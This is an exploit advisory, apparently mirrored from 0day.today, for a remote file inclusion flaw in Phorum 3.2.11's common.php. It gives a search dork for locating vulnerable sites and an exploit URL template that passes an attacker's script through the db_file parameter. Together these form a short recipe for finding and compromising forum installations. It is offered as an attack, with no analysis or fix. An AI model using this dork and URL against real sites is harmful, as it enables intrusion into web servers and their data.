Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability

🗓️ 06 Dec 2006 00:00:00Reported by Mr-m07Type

zdt🔗 0day.today👁 88 Views

Phorum <= 3.2.11 Remote File Include Vulnerabilit

===============================================================
Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
===============================================================



===========================================================
Yee7TeaM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
===========================================================



#  0day.today [2018-03-02]  #

06 Dec 2006 00:00Current

7.1High risk

Vulners AI Score7.1